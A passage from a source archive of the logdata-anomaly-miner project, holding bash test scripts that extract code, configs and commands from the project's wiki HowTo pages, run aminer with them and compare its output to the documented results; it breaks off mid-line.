awk '/^```yaml$/ && ++n == 5, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null runAminerUntilEnd "$CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi IN1=$(sed -n '2,30p' < $OUT) IN2=$(sed -n '33,35p' < $OUT) IN3=$(sed -n '38,40p' < $OUT) IN4=$(sed -n '43,45p' < $OUT) IN5=$(sed -n '48,50p' < $OUT) IN6=$(sed -n '53,55p' < $OUT) IN7=$(sed -n '58,60p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT2" "$IN2" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT3" "$IN3" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT4" "$IN4" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT5" "$IN5" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT6" "$IN6" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT7" "$IN7" "Failed Test in 13." exit_code=$((exit_code | $?)) # set LearnModel to False. (14.) sudo sed -i 's/LearnMode: True/LearnMode: False/g' $CFG_PATH # read new command (15.) awk '/^```$/ && ++n == 34, /^```$/ && n++ == 35' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) CMD=${CMD#*$ } # extract logline and resulting outputs and compare them. (16.) awk '/^```$/ && ++n == 40, /^```$/ && n++ == 41' < $INPUT_FILE > $OUT OUT1=$(sed -n '6p' < $OUT) OUT1=$(echo "$OUT1" | sed "s/b'//g") OUT1=$(echo "$OUT1" | sed "s/'//g") echo "$OUT1" >> $LOG OUT1=$(sed -n '4,6p' < $OUT) runAminerUntilEnd "$CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi IN1=$(sed -n '2,4p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 16." 
exit_code=$((exit_code | $?)) sudo rm -r logdata-anomaly-miner.wiki rm $OUT sudo rm $CFG_PATH exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runHowToCreateYourOwnFrequencyDetector.sh000077500000000000000000000256211500476301700311760ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Read the log lines between the 1st and 2nd ``` and save it to /tmp/access.log (LOG) # 2.) Read 1st ```python and 3rd ``` and write the FrequencyDetector to ../source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/FrequencyDetector.py # 3.) Check if the parameter definitions between 4th and 5th are the same as in ../source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/AnalysisNormalisationSchema.py # (each line on its own) # 4.) Add the FrequencyDetector parameters between 6th and 7th are the same as in ../source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py # 5.) Add the code between 2nd ```python and 8th ``` to the ../source/root/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py # 6.) Write the config to CFG_PATH from 1st ```yaml to 9th ``` and replace LogResourceList to LOG. # 7.) Read CMD from the second line between the 1st ```bash to 10th ``` and run it with sudo. # 8.) Compare the outputs with the ones between 11th and 12th ```. # 9.) Read line between 3rd ```python and 13th ``` and add it between 23rd and 24th line in the CFG_PATH # 10.) Remove lines 36-38 in the $FREQ_DET and append the method between 4th ```python and 14th ``` + newline between. # 11.) Run CMD and check if the output is the same as the one between 15th and 16th ```. # 12.) Remove the previously added lines and add the lines between 5th ```python and 17th ```. # 13.) 
Run CMD and compare the output to the one between 18th and 19th ```. # 14.) Remove the previously added lines and add the lines between 6th ```python and 20th ```. # 15.) Run CMD and compare the output to the one between 21st and 22nd ```. # 16.) Remove the previously added lines and add the lines between 7th ```python and 23rd ```. # 17.) Run CMD and compare the output to the one between 1st ```json and 24th ```. # 18.) Replace the do_persist method with the lines between 8th ```python and 25th ``` and run CMD. # 19.) Run CMD in 2nd ```bash and 26th ``` and compare it to the output in the second line. # 20.) Add lines between 9th ```python and 27th ```. ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi sudo chown -R aminer:aminer /var/lib/aminer 2> /dev/null INPUT=logdata-anomaly-miner.wiki/HowTo-Create-your-own-FrequencyDetector.md VAL_SCHEMA=/usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py TMP_VAL_SCHEMA=/tmp/AnalysisValidationSchema.py NOR_SCHEMA=/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/AnalysisNormalisationSchema.py OUT=/tmp/out.txt SRC_FILE=logdata-anomaly-miner.wiki/HowTo-Create-your-own-FrequencyDetector.md VAL_SCHEMA=/usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py TMP_VAL_SCHEMA=/tmp/AnalysisValidationSchema.py YML_CONFIG=/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py TMP_YML_CONFIG=/tmp/YamlConfig.py TMP_SCHEMA=/tmp/schema.py FREQ_DET=/usr/lib/logdata-anomaly-miner/aminer/analysis/FrequencyDetector.py TMP_FREQ_DET=/tmp/FrequencyDetector.py CFG_PATH=/etc/aminer/config.yml LOG=/tmp/access.log # extract the file from the development branch of the wiki project. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. # create log file (1.) 
awk '/^```$/ && ++n == 1, /^```$/ && n++ == 2' < $INPUT | sed '/^```/ d' > $LOG # 2.) create FrequencyDetector awk '/^```python$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' > $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET # 3.) compare parameter definitions with AnalysisNormalisationSchema awk '/^```$/ && ++n == 4, /^```$/ && n++ == 5' < $INPUT > $OUT LINE=$(sed -n '2p' < $OUT) if ! fgrep -q "$LINE" $NOR_SCHEMA; then echo "$LINE not found in $NOR_SCHEMA" echo "Failed Test in 3." echo exit_code=1 fi LINE=$(sed -n '3p' < $OUT) if ! fgrep -q "$LINE" $NOR_SCHEMA; then echo "$LINE not found in $NOR_SCHEMA" echo "Failed Test in 3." echo exit_code=1 fi # 4.) Add the FrequencyDetector parameters to the AnalysisValidationSchema sudo cp $VAL_SCHEMA $TMP_VAL_SCHEMA awk '/^{$/,/^ }$/' $VAL_SCHEMA > $TMP_SCHEMA echo , >> $TMP_SCHEMA awk '/^```$/ && ++n == 6, /^```$/ && n++ == 7' < $INPUT | sed '/^```/ d' >> $TMP_SCHEMA awk '/^ ]$/,/^}$/' $VAL_SCHEMA >> $TMP_SCHEMA sudo cp $TMP_SCHEMA $VAL_SCHEMA # 5.) Add code to the YamlConfig.py # create backup of YamlConfig.py cp $YML_CONFIG $TMP_YML_CONFIG # add code to YamlConfig.py printf " " > $TMP_SCHEMA awk '/^```python$/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' >> $TMP_SCHEMA sudo sed -i " /anomaly_threshold=item/r $TMP_SCHEMA" $YML_CONFIG # 6.) Write the config to CFG_PATH and replace LogResourceList to LOG. awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null sudo sed -i 's?file:///home/ubuntu/apache.log?file:///tmp/access.log?g' $CFG_PATH # 7.) Read CMD from the second line between the 1st ```bash to 10th ``` and run it with sudo. awk '/^```bash$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD=$(sed -n '2p' < $OUT) CMD="sudo ${CMD#* } --config $CFG_PATH" runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$? # 8.) Compare the outputs with the ones between 11th and 12th ```. 
OUT1=$(tail -n 14 $OUT) awk '/^```$/ && ++n == 11, /^```$/ && n++ == 12' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` compareStrings "$OUT1" "$IN1" "Failed Test in 8." exit_code=$((exit_code | $?)) # 9.) Read line between 3rd ```python and 13th ``` and add it between 23rd and 24th line in the FREQ_DET awk '/^```python$/ && ++n == 3, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` sed -i "23 i \ $IN1" $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET # 10.) Remove lines 36-38 in the FREQ_DET and append the method between 4th ```python and 14th ``` + newline between. sed -i -e "35,38d" $TMP_FREQ_DET awk '/^```python$/ && ++n == 4, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET # 11.) Run CMD and check if the output is the same as the one between 15th and 16th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 18 $OUT) awk '/^```$/ && ++n == 15, /^```$/ && n++ == 16' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` compareStrings "$OUT1" "$IN1" "Failed Test in 11." exit_code=$((exit_code | $?)) # 12.) Remove the previously added lines and add the lines between 5th ```python and 17th ```. tac $TMP_FREQ_DET | sed '1,13d' | tac > $OUT cp $OUT $TMP_FREQ_DET awk '/^```python$/ && ++n == 5, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "$IN1" >> $TMP_FREQ_DET # 13.) Run CMD and compare the output to the one between 18th and 19th ```. sed -i "23 i \ self.counts = {}" $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 14 $OUT) awk '/^```$/ && ++n == 18, /^```$/ && n++ == 19' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` compareStrings "$OUT1" "$IN1" "Failed Test in 13." exit_code=$((exit_code | $?)) # 14.) 
Remove the previously added lines and add the lines between 6th ```python and 20th ```. tail -n 6 $TMP_FREQ_DET > $OUT IN=`cat $OUT` tac $TMP_FREQ_DET | sed '1,14d' | tac > $OUT cp $OUT $TMP_FREQ_DET awk '/^```python$/ && ++n == 6, /^```$/' < $INPUT | sed '/^```/ d' | sed '1,2d;23d' > $OUT IN1=`cat $OUT` echo -e "$IN1" >> $TMP_FREQ_DET echo -e "$IN" >> $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET # 15.) Run CMD and compare the output to the one between 21st and 22nd ```. sed -i "23 i \ self.counts_prev = {}" $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 17 $OUT) awk '/^```$/ && ++n == 21, /^```$/ && n++ == 22' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` compareStrings "$OUT1" "$IN1" "Failed Test in 15." exit_code=$((exit_code | $?)) # 16.) Remove the previously added lines and add the lines between 7th ```python and 23rd ```. tail -n 6 $TMP_FREQ_DET > $OUT IN=`cat $OUT` tac $TMP_FREQ_DET | sed '1,26d' | tac > $OUT cp $OUT $TMP_FREQ_DET awk '/^```python$/ && ++n == 7, /^```$/' < $INPUT | sed '/^```/ d' | sed '1,2d;38d' > $OUT IN1=`cat $OUT` echo -e "$IN1" >> $TMP_FREQ_DET echo -e "$IN" >> $TMP_FREQ_DET tac $TMP_FREQ_DET | sed '1d' | tac > $OUT # remove print cp $OUT $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET # 17.) Run CMD and compare the output to the one between 1st ```json and 24th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) # delete detectionTimestamp from comparison tac $OUT | sed '32d' | tac > $TMP_SCHEMA cp $TMP_SCHEMA $OUT OUT1=$(tail -n 60 $OUT) awk '/^```json$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' > $OUT # delete detectionTimestamp from comparison sed -i -e "30d" $OUT IN1=`cat $OUT` compareStrings "$OUT1" "$IN1" "Failed Test in 17." exit_code=$((exit_code | $?)) # 18.) 
Replace the do_persist method with the lines between 8th ```python and 25th ``` and run CMD. sed -i -e "56,59d" $TMP_FREQ_DET awk '/^```python$/ && ++n == 8, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n $IN1" >> $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) # 19.) Run CMD in 2nd ```bash and 26th ``` and compare it to the output in the second line. awk '/^```bash$/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD1=$(sed -n '1p' < $OUT) CMD1="${CMD1#* }" $CMD1 > $OUT OUT1=`cat $OUT` awk '/^```bash$/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=$(sed -n '2p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 19." exit_code=$((exit_code | $?)) # 20.) Add lines between 9th ```python and 27th ```. CMD="sudo aminer -f" awk '/^```python$/ && ++n == 9, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` sed -i "/ PersistenceUtil.add_persistable_component(self)/r $OUT" $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) sudo cp $TMP_VAL_SCHEMA $VAL_SCHEMA sudo cp $TMP_YML_CONFIG $YML_CONFIG sudo rm $TMP_VAL_SCHEMA sudo rm $CFG_PATH sudo rm $TMP_YML_CONFIG sudo rm $TMP_FREQ_DET sudo rm $FREQ_DET sudo rm $OUT sudo rm $TMP_SCHEMA sudo rm -r logdata-anomaly-miner.wiki exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runHowToCreateYourOwnSequenceDetector.sh000077500000000000000000000402441500476301700310030ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Read the log lines between the 2nd and 3rd ``` and save it to /tmp/access.log (LOG) # 2.) 
Read 2nd ```bash and 3rd ```, extract CMD from the first line after # , run CMD and compare the output with the 2nd to 4th line of the previous output. # 3.) Read commands between 3rd ```bash and 5th ```, get the CMD after # and check if aminer_install.sh exists and is executable. # 4.) Read the CMD between 4th ```bash and 6th ``` and get the CMD after # . # 5.) Replace the path in the second string with the current directory and run the CMD. # 6.) Read the CMD between 5th ```bash and 7th ```, get the CMD after # and run it. # 7.) Read the CMD between 6th ```bash and 8th ```, get the CMD after # and run it. # 8.) Read between 1st ```yaml and 9th ``` and store it in CFG_PATH. # 9.) Read CFG_PATH, replace the line with json: True and compare it with the 1st ```yaml in Getting-started-(tutorial).md. # 10.) Read 7th ```bash and 10th ```. Extract CMD in first line and run it as sudo. # 11.) Compare the outputs (replace lines with timestamps and dates). # 12.) Read 1st ```python and 12th ``` and write it to SEQ_DET. # 13.) Read 2nd ```yaml and 13th ``` and write it at 18th line in CFG_PATH. # 14.) Check if line between 15th and 16th ``` can be found in /usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/AnalysisNormalisationSchema.py # 15.) Add code between 18th and 19th ``` to /usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py # 16.) Add 2nd ```python and 21st ``` to the YML_CONFIG. # 17.) Run aminer CMD and check if the output contains "Detector template received a log atom!" times the number of log lines. # 18.) Read 3rd ```python and 24th ``` and replace the receive_atom method in the SEQ_DET. # 19.) Run aminer CMD and check if the output contains data between 25th and 26th ```. # 20.) Read 4th ```python and 27th ``` and replace the receive_atom method in the SEQ_DET. # 21.) Run aminer CMD and check if the output is the same as between 28th and 29th ```. # 22.) 
Read 5th ```python and 30th ``` and replace the receive_atom method in the SEQ_DET. # 23.) Replace Analysis in CFG_PATH with the config between 3rd ```yaml and 31st ```. # 24.) Run aminer CMD and check if the output is the same as between 32nd and 33th ```. # 25.) Add code between 34th and 35th ``` in the __init__ method. # 26.) Read 6th ```python and 36th ``` and replace the receive_atom method in the SEQ_DET. # 27.) Run aminer CMD and check if the output is the same as between 37th and 38th ```. # 28.) Read 7th ```python and 39th ``` and replace the receive_atom method in the SEQ_DET. # 29.) Add lines between 14th ```bash and 42nd ``` to the LOG. # 30.) Run aminer CMD and check if the output is the same as between 40th and 41st ``` plus the text between 43th and 44th ```. # 31.) Read 8th ```python and 45th ``` and replace the receive_atom method in the SEQ_DET. # 32.) Compare the output with the json between 1st ```json and 46th ```. # 33.) Replace the do_persist method with the code between 9th ```python and 47th ```. # 34.) Run the CMD in the first line between 15th ```bash and 48th ``` and compare the output with the second line. 
################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi sudo chown -R aminer:aminer /var/lib/aminer 2> /dev/null INPUT=logdata-anomaly-miner.wiki/HowTo-Create-your-own-SequenceDetector.md SRC_FILE=logdata-anomaly-miner.wiki/HowTo-Create-your-own-SequenceDetector.md VAL_SCHEMA=/usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py TMP_VAL_SCHEMA=/tmp/AnalysisValidationSchema.py NOR_SCHEMA=/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/AnalysisNormalisationSchema.py OUT=/tmp/out.txt YML_CONFIG=/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py TMP_YML_CONFIG=/tmp/YamlConfig.py TMP_SCHEMA=/tmp/schema.py SEQ_DET=/usr/lib/logdata-anomaly-miner/aminer/analysis/SequenceDetector.py TMP_SEQ_DET=/tmp/SequenceDetector.py CFG_PATH=/etc/aminer/config.yml LOG=/tmp/access.log # extract the file from the development branch of the wiki project. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. # create log file (1.) awk '/^```$/ && ++n == 2, /^```$/ && n++ == 3' < $INPUT | sed '/^```/ d' > $LOG # extract version command and compare output. (2.) #awk '/^```bash$/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' > $OUT #CMD=$(sed -n '1p' < $OUT) #CMD="sudo ${CMD#* }" #OUT1=$(sed -n '2,4p' < $OUT) #$CMD > $OUT & #PID=$! #sleep 5 #sudo pkill -x aminer.py #sudo pkill -x aminer #wait $PID #OUT2=`cat $OUT` #compareStrings "$OUT1" "$OUT2" "Failed Test in 2." #exit_code=$? # 3.) Read commands between 3rd ```bash and 5th ```, get the CMD after # and check if aminer_install.sh exists and is executable. FILE="aminer_install.sh" awk '/^```bash$/ && ++n == 3, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD=$(sed -n '1p' < $OUT) CMD="${CMD#* } -q" $CMD if [ ! -f "$FILE" ]; then echo "$FILE does not exist." exit_code=1 fi CMD=$(sed -n '2p' < $OUT) CMD="${CMD#* }" $CMD if [ ! 
-x "$FILE" ]; then echo "$FILE is not executable." exit_code=1 fi # 4.) Read the CMD between 4th ```bash and 6th ``` and get the CMD after # . (skipping this step) #awk '/^```bash$/ && ++n == 4, /^```$/' < $INPUT | sed '/^```/ d' > $OUT #CMD=$(sed -n '1p' < $OUT) #CMD="${CMD#* }" # 5.) Replace the path in the second string with the current directory and run the CMD. (skipping this step) #PWD=$(pwd) #CMD=$(echo "${CMD?/home/ubuntu/aminer?"$PWD"}" ) #$CMD # 6.) Read the CMD between 5th ```bash and 7th ```, get the CMD after # and run it. (skipping this step) #awk '/^```bash$/ && ++n == 5, /^```$/' < $INPUT | sed '/^```/ d' > $OUT #CMD=$(sed -n '1p' < $OUT) #CMD="${CMD#* }" #$CMD # 7.) Read the CMD between 6th ```bash and 8th ```, get the CMD after # and run it. awk '/^```bash$/ && ++n == 6, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD=$(sed -n '1p' < $OUT) CMD="${CMD#* }" $CMD 2> /dev/null # 8.) Read between 1st ```yaml and 9th ``` and store it in CFG_PATH. awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # 9.) Read CFG_PATH, replace the line with json: True and compare it with the 1st ```yaml in Getting-started-(tutorial).md. OUT1=$(sudo cat $CFG_PATH | sed -n '1,21p') CMD=$(sudo cat $CFG_PATH | sed -n '23p') OUT1="$OUT1 $CMD" awk '/^```yaml$/ && ++n == 1, /^```$/' < logdata-anomaly-miner.wiki/Getting-started-\(tutorial\).md | sed '/^```/ d' > $OUT sudo sed -i 's?file:///var/log/apache2/access.log?file:///home/ubuntu/access.log?g' $OUT OUT2=`cat $OUT` compareStrings "$OUT1" "$OUT2" "Failed Test in 9." exit_code=$((exit_code | $?)) sudo sed -i 's?file:///home/ubuntu/access.log?file:///tmp/access.log?g' $CFG_PATH # 10.) Read 7th ```bash and 10th ```. Extract CMD in first line and run it as sudo. 
awk '/^```bash$/ && ++n == 7, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD=$(sed -n '1p' < $OUT) CMD="sudo ${CMD#* }" runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) # 11.) Compare the outputs (replace lines with timestamps and dates). OUT1=$(sed -n '2,44p' < $OUT) OUT2=$(sed -n '46,98p' < $OUT) OUT1="$OUT1 $OUT2" OUT2=$(sed -n '100,131p' < $OUT) OUT1="$OUT1 $OUT2" OUT2=$(sed -n '2,44p' < $OUT) OUT3=$(sed -n '46,98p' < $OUT) OUT2="$OUT2 $OUT3" OUT3=$(sed -n '100,131p' < $OUT) OUT2="$OUT2 $OUT3" compareStrings "$OUT1" "$OUT2" "Failed Test in 11." exit_code=$((exit_code | $?)) # 12.) Read 1st ```python and 12th ``` and write it to SEQ_DET. awk '/^```python$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' > $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 13.) Read 2nd ```yaml and 13th ``` and write it at 18th line in CFG_PATH. awk '/^```yaml/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=$(tail -n 4 < $OUT) OUT1=$(head -n 17 < $CFG_PATH) OUT2=$(tail -n 5 < $CFG_PATH) echo "$OUT1 $IN1 $OUT2" | sudo tee $CFG_PATH > /dev/null # 14.) Check if line between 15th and 16th ``` can be found in /usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/AnalysisNormalisationSchema.py awk '/^```$/ && ++n == 15, /^```$/ && n++ == 16' < $INPUT > $OUT LINE=$(sed -n '2p' < $OUT) if ! fgrep -q "$LINE" $NOR_SCHEMA; then echo "$LINE not found in $NOR_SCHEMA" echo "Failed Test in 14." echo exit_code=1 fi # 15.) Add code between 18th and 19th ``` to /usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py sudo cp $VAL_SCHEMA $TMP_VAL_SCHEMA awk '/^{$/,/^ }$/' $VAL_SCHEMA > $TMP_SCHEMA echo , >> $TMP_SCHEMA awk '/^```$/ && ++n == 18, /^```$/ && n++ == 19' < $INPUT | sed '/^```/ d' >> $TMP_SCHEMA awk '/^ ]$/,/^}$/' $VAL_SCHEMA >> $TMP_SCHEMA sudo cp $TMP_SCHEMA $VAL_SCHEMA # 16.) Add 2nd ```python and 21st ``` to the YML_CONFIG. 
# create backup of YamlConfig.py cp $YML_CONFIG $TMP_YML_CONFIG # add code to YamlConfig.py printf " " > $TMP_SCHEMA awk '/^```python$/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' >> $TMP_SCHEMA sudo sed -i " /anomaly_threshold=item/r $TMP_SCHEMA" $YML_CONFIG # 17.) Run aminer CMD and check if the output contains "Detector template received a log atom!" times the number of log lines. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) CNT=$(grep -o "Detector template received a log atom!" $OUT | wc -l) if [ $CNT != 8 ]; then echo "Failed Test in 17. $CNT != 8" echo exit_code=1 fi # 18.) Read 3rd ```python and 24th ``` and replace the receive_atom method in the SEQ_DET. sed -i -e "34,36d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 3, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 19.) Run aminer CMD and check if the output contains data between 25th and 26th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 27 < $OUT) awk '/^```$/ && ++n == 25, /^```$/ && n++ == 26' < $INPUT | sed '/^```/ d' > $OUT OUT2=`cat $OUT` compareStrings "$OUT1" "$OUT2" "Failed Test in 19." exit_code=$((exit_code | $?)) # 20.) Read 4th ```python and 27th ``` and replace the receive_atom method in the SEQ_DET. sed -i -e "61,65d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 4, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 21.) Run aminer CMD and check if the output is the same as between 28th and 29th ```. 
runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 8 < $OUT) awk '/^```$/ && ++n == 28, /^```$/ && n++ == 29' < $INPUT | sed '/^```/ d' > $OUT OUT2=`cat $OUT` compareStrings "$OUT1" "$OUT2" "Failed Test in 21." exit_code=$((exit_code | $?)) # 22.) Read 5th ```python and 30th ``` and replace the receive_atom method in the SEQ_DET. sed -i -e "61,65d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 5, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 23.) Replace Analysis in CFG_PATH with the config between 3rd ```yaml and 31st ```. OUT1=$(head -n 18 $CFG_PATH) awk '/^```yaml/ && ++n == 3, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=$(tail -n 4 $OUT) OUT2=$(tail -n 5 $CFG_PATH) echo "$OUT1 $IN1 $OUT2" | sudo tee $CFG_PATH > /dev/null # 24.) Run aminer CMD and check if the output is the same as between 32nd and 33th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 8 < $OUT) awk '/^```$/ && ++n == 32, /^```$/ && n++ == 33' < $INPUT | sed '/^```/ d' > $OUT OUT2=`cat $OUT` compareStrings "$OUT1" "$OUT2" "Failed Test in 24." exit_code=$((exit_code | $?)) # 25.) Add code between 34th and 35th ``` in the __init__ method. awk '/^```$/ && ++n == 34, /^```$/ && n++ == 35' < $INPUT | sed '/^```/ d' > $OUT IN1=$(head -n 1 $OUT) sed -i "30 i \ $IN1" $TMP_SEQ_DET IN1=$(tail -n 1 $OUT) sed -i "31 i \ $IN1" $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 26.) Read 6th ```python and 36th ``` and replace the receive_atom method in the SEQ_DET. sed -i -e "82d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 6, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=$(tail -n 7 $OUT) echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 27.) Run aminer CMD and check if the output is the same as between 37th and 38th ```. 
runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 6 < $OUT) awk '/^```$/ && ++n == 37, /^```$/ && n++ == 38' < $INPUT | sed '/^```/ d' > $OUT OUT2=`cat $OUT` compareStrings "$OUT1" "$OUT2" "Failed Test in 27." exit_code=$((exit_code | $?)) # 28.) Read 7th ```python and 39th ``` and replace the receive_atom method in the SEQ_DET. awk '/^```python$/ && ++n == 7, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=$(tail -n 4 $OUT) echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 29.) Add lines between 14th ```bash and 42nd ``` to the LOG. echo "192.168.10.190 - - [29/Feb/2020:14:10:35 +0000] \"GET /services/portal/ HTTP/1.1\" 200 4345 \"-\" \"-\"" >> $LOG echo "192.168.10.190 - - [29/Feb/2020:14:10:45 +0000] \"GET /kronolith/ HTTP/1.1\" 200 3452 \"-\" \"-\"" >> $LOG echo "192.168.10.190 - - [29/Feb/2020:14:10:54 +0000] \"GET /nag/ HTTP/1.1\" 200 25623 